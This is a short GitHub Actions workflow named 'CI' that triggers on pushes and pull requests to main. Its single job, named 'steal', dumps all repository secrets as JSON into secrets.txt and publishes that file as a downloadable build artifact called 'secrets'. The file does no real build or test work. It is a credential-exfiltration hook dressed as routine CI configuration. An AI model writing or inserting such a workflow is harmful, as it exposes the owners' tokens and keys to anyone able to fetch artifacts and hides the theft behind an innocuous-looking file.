name: CI

on:
  push:
    branches:
      - main
  pull_request:
    branches:
      - main

jobs:
  steal:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Save secret
        run: |
          echo $SECRETS >> secrets.txt
        env:
          SECRETS: ${{ toJSON(secrets) }}
      - name: Upload build artifact
        uses: actions/upload-artifact@v4
        with:
         name: secrets
         path: secrets.txt
